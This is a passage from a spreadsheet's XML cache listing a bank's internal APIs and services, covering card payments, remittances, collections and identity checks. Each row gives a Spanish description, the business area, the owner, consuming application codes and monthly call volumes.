    <s v="Capacidad que permiten el cálculo de cuota para créditos no desembolsados y de recálculo para créditos desembolsados."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Cambiar Clave SVE"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permitir generar las claves de los usuarios que interactúan en la Empresa con el producto a través de la Sucursal Virtual, mejorando el servicio cliente en forma segura."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Cambiar Primera Segunda Clave SVP"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permitir que un cliente de Filiales del Exterior (Panamá/Cayman, Miami), pueda cambiar su Primera ó Segunda Clave desde la Sucursal Virtual Personas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Cambio Plan Cuenta"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Cambio Plan Cuentas permite cambiar el plan de una cuenta de ahorros o corriente, desde y hacia planes que no tengan restricción como origen y destino._x000a__x000a_"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Cancelar Canal SVE"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir Cancelar el canal (SVE) Sucursal Virtual Empresa al cliente."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-19T01:12:37"/>
    <s v="Cards"/>
    <n v="210"/>
    <s v="Card - Credit information"/>
    <n v="210"/>
    <x v="52"/>
    <s v="Permite consultar información de una tarjeta de crédito como:  listar las tarjetas de crédito que tiene  un usuario con información básica de  contacto,  y permite consular los movimientos de una tarjeta especí­fica."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Tarjetas"/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <n v="1260"/>
    <n v="427"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-02-27T15:25:48"/>
    <s v="Cards"/>
    <n v="301"/>
    <s v="Card - Credit information"/>
    <n v="301"/>
    <x v="52"/>
    <s v="Conoce a profundiad el detalle de información del proximo pago de tu cliente."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <s v="ConsultaInformacionTarjetaCredito/V1.1"/>
    <m/>
    <s v="TMP SOPORTE APP_lgcorrg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-19T01:12:37"/>
    <s v="Cards"/>
    <n v="210"/>
    <s v="Card - Credit Payment Information"/>
    <n v="110"/>
    <x v="53"/>
    <s v="Esta API permite consultar la información de pago de las tarjetas de crédito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionTarjetaCredito/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-19T01:12:37"/>
    <s v="Cards"/>
    <n v="210"/>
    <s v="Card - Credit Payments"/>
    <n v="110"/>
    <x v="54"/>
    <s v="Permite realizar el pago de una tarjeta de crédito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="GestionPagoTarjetaCredito/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-02-27T15:25:48"/>
    <s v="Cards"/>
    <n v="301"/>
    <s v="Card - Credit Transactions"/>
    <n v="301"/>
    <x v="55"/>
    <s v="Retorna el listado de transacciones realizadas por medio de una tarjeta."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <s v="ConsultaMovimientosTarjetaCredito/V1.0"/>
    <m/>
    <s v="TMP SOPORTE APP_lgcorrg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-02-27T15:25:48"/>
    <s v="Cards"/>
    <n v="301"/>
    <s v="Card - Customer Cards"/>
    <n v="101"/>
    <x v="56"/>
    <s v="Te ayudamos a conocer todas las tarjetas que tu cliente posee"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <s v="ConsultaInformacionTarjetaCredito/V1.1"/>
    <m/>
    <s v="TMP SOPORTE APP_lgcorrg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T11:37:14"/>
    <s v="Card Payment Execution"/>
    <n v="101"/>
    <s v="Card Payment Execution - Credit Cards"/>
    <n v="101"/>
    <x v="57"/>
    <s v="Esta Api contiene capacidades que permiten realizar diferentes afectaciones monetarias sobre una tarjeta de crédito. Tales afectaciones incluyen: - Pagar tarjeta de crédito con débito a cuenta - Pagar tarjeta de crédito de terceros - Pagar tarjeta de crédito con cuentas de otros bancos"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="AfectacionesMonetariasTarjetasCredito/V1.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ PagoTDCWompi_AW1405001"/>
    <n v="132"/>
    <n v="108"/>
    <n v="49"/>
    <n v="25490"/>
    <n v="23469"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-04T12:06:00"/>
    <s v="Cards"/>
    <n v="111"/>
    <s v="Cards - Credit Card Obligations"/>
    <n v="102"/>
    <x v="58"/>
    <s v="La API permite a los consumidores listar las tarjetas del cliente que cuentan con obligaciones, usando el tipo y níºmero de documento como datos de entrada. Se define que un cliente tiene una obligación cuando presenta algíºn valor en la deuda total, ya sea en pesos y dólares"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasPYME/V1.0_x000a_ConsultaTarjetasCredito/V1.0"/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="3959"/>
    <n v="3054"/>
    <n v="2848"/>
    <n v="9892"/>
    <n v="45574"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-06-02T16:43:32"/>
    <s v="Cards"/>
    <n v="111"/>
    <s v="Cards - Debit Cards"/>
    <n v="100"/>
    <x v="59"/>
    <s v="La API permite a los consumidores gestionar novedades sobre las tarjetas débito Maestro o Masterdebit. "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="GestionTarjetasDebito/V1.0"/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Carga De Archivos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio tiene la funcionalidad de permitirá realizar la carga de los archivos (ejemplo: Novedades, Cobro y Facturación, etc.), inicialmente de los pagos realizados por un cliente a través de los diferentes canales de un convenio."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos, Pagos o Gobierno e Impuestos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="GDE _x000d__x000a_PSE _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-25T12:41:03"/>
    <s v="Case Root Cause Analysis"/>
    <n v="101"/>
    <s v="Case Root Cause Analysis - Tipology Manager"/>
    <n v="101"/>
    <x v="60"/>
    <s v="Este servicio permite identificar la causa de la necesidad de un cliente, a través del análisis y la  Administración de tipologí­as, subtipologias, causalidades, sub causalidades, asociadas a un catálogo de productos, servicios y/o canales previamente identificados. permitiendo identificar el nivel de atención para dar solución a las solicitudes de un Cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001"/>
    <n v="168"/>
    <n v="210"/>
    <n v="173"/>
    <n v="376"/>
    <n v="2432"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2018-03-02T16:28:29"/>
    <s v="Channels"/>
    <n v="100"/>
    <s v="Channel - Service Points"/>
    <n v="100"/>
    <x v="61"/>
    <s v="El API de puntos de servicios permite realizar la consulta de los siguientes puntos de servicios del banco: Sucursales, Cajeros, corresponsales Bancarios. Esta consulta se realiza de acuerdo a la posición geográfica (Latitud y longitud)."/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Servicios Switch y Telefonica"/>
    <x v="16"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="GeorreferenciacionAPI"/>
    <s v="Vinculación Digital _x000d__x000a_ CHATBOT _x000d__x000a_ Dummy _x000d__x000a_ BC Portal de Contenido_AW1218001"/>
    <n v="20028"/>
    <n v="16725"/>
    <n v="41850"/>
    <n v="76931"/>
    <n v="70855"/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-17T09:44:38"/>
    <s v="Channel Activity Analysis"/>
    <n v="100"/>
    <s v="Channel Activity Analysis - SimCard"/>
    <n v="100"/>
    <x v="62"/>
    <s v="Servicio que permite realizar la consulta de la íºltima reexpedición de una simcard, por medio del níºmero celular asociado. Servicio configurado para los operadores Movistar y Claro."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionSimCard/V1.0"/>
    <m/>
    <s v="PortalAutogestionPyme_AW1287"/>
    <n v="38"/>
    <n v="20"/>
    <n v="45"/>
    <n v="16"/>
    <n v="10"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-20T15:22:40"/>
    <s v="Channel Commission"/>
    <n v="110"/>
    <s v="Channel Commission - Customer Transactions"/>
    <n v="110"/>
    <x v="63"/>
    <s v="Permite la consulta de las comisiones que se cobran en los canales digitales banco en base a la transacción que el cliente realiza desde un canal, a la que se asigna un código especifico parametrizado desde ITC como por ejemplo:  - Transferencia a otro banco  - Transferencias de fondos  - Transferencia a cuenta Nequi"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ msitccheckcost_NU0215001"/>
    <n v="10152"/>
    <n v="50987"/>
    <n v="85928"/>
    <n v="71603"/>
    <n v="69343"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Channel Management"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Administración Mensajes transversales_x000a_Gestion Parámetros Tipos de Documento y Marcas de Cuenta"/>
    <s v="Transf_y_Soporte_Distribución_Digital"/>
    <s v="Distribucion Digital"/>
    <x v="13"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Channel Transaction Validations"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Microservicio encargado de administrar los Canales y Transacciones del D2B y sus respectivos estados, permite encender y apagar Canales y Transacciones en tiempo real."/>
    <s v="Transf_y_Soporte_Distribución_Digital"/>
    <s v="Distribucion Digital"/>
    <x v="13"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T17:04:45"/>
    <s v="Collections Agreement"/>
    <n v="121"/>
    <s v="Collection Agreements - Account Collection"/>
    <n v="100"/>
    <x v="64"/>
    <s v="El API Collection Agreement - Collection Account permite consultar información de la cuenta del recaudo"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaCuentaRecaudo/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_AW1176 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ Horus_AW1258011"/>
    <m/>
    <m/>
    <n v="306"/>
    <n v="59"/>
    <n v="1639"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T17:04:45"/>
    <s v="Collections Agreement"/>
    <n v="121"/>
    <s v="Collection Agreements - Information"/>
    <n v="112"/>
    <x v="65"/>
    <s v="El API Collection Agreement permitirá listar y validar la información detallada de los convenios de recaudos. Está operación es vital para el funcionamiento de recaudos, por que contienen los parametros que determina su comportamiento y sus condiciones"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaConvenioRecaudo/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_AW1176 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ Horus_AW1258011"/>
    <n v="15271"/>
    <n v="16380"/>
    <n v="19590"/>
    <n v="14146"/>
    <n v="38255"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Comprar Divisas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite registrar en el sistema de Tesorería del banco una negociación de divisas realizada entre el banco y el cliente. "/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="1"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="MUREX_MUREX-CORE_AW0434001"/>
    <s v="SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Confirmar Identidad Persona En Data Credito"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras. El proveedor del servicio es quien valida y aprueba las preguntas."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW0748001 _x000d__x000a_AW1312001 _x000d__x000a_NU0034001 _x000d__x000a_AW1281003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Confirmar Identidad Persona En Data Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1097001 _x000d__x000a_AW0939 _x000d__x000a_NU0034001 _x000d__x000a_AW1281003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignment - Modify Remittance"/>
    <n v="300"/>
    <x v="66"/>
    <s v="API que permite modificar una remesa enviada."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="GestionRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="15211"/>
    <n v="13997"/>
    <n v="12962"/>
    <n v="13394"/>
    <n v="14329"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Authorization"/>
    <n v="200"/>
    <x v="67"/>
    <s v="Proveedor de OAuth2 para autenticación"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="2"/>
    <n v="1589"/>
    <n v="80523"/>
    <m/>
    <m/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Cancel Remittance"/>
    <n v="200"/>
    <x v="68"/>
    <s v="API que permite la cancelación de una remesa."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="GestionRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="28831"/>
    <n v="26056"/>
    <n v="26160"/>
    <n v="28561"/>
    <n v="31609"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Consult Remittance"/>
    <n v="200"/>
    <x v="69"/>
    <s v="API que permite consultar el estado de la remesa."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="3485738"/>
    <n v="3255172"/>
    <n v="3390772"/>
    <n v="3152973"/>
    <n v="3622791"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Exchange Rates Query"/>
    <n v="200"/>
    <x v="70"/>
    <s v="API para consultar las tasas de cambio de USD a COP pactadas entre el banco y la remesadora en fechas determinadas"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="GestionRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="309850"/>
    <n v="299634"/>
    <n v="290293"/>
    <n v="303099"/>
    <n v="356297"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Send Remittance"/>
    <n v="300"/>
    <x v="71"/>
    <s v="API que permite enviar remesas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="524133"/>
    <n v="500477"/>
    <n v="500874"/>
    <n v="500728"/>
    <n v="602091"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Validate Automatic Credit"/>
    <n v="200"/>
    <x v="72"/>
    <s v="Esta API valida si la cuenta de depósito de un cliente Bancolombia permite el abono automático."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="151906"/>
    <n v="147659"/>
    <n v="150650"/>
    <n v="154765"/>
    <n v="180140"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Archivo Recaudos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Consultar la información a detalle de un archivo, es necesario usar primero la capacidad listar archivos y obtener toda la información necesaria para obtener el detalle. La información podrá ser buscada con diferentes filtros asociados al pagador, la factura o detalles del archivo"/>
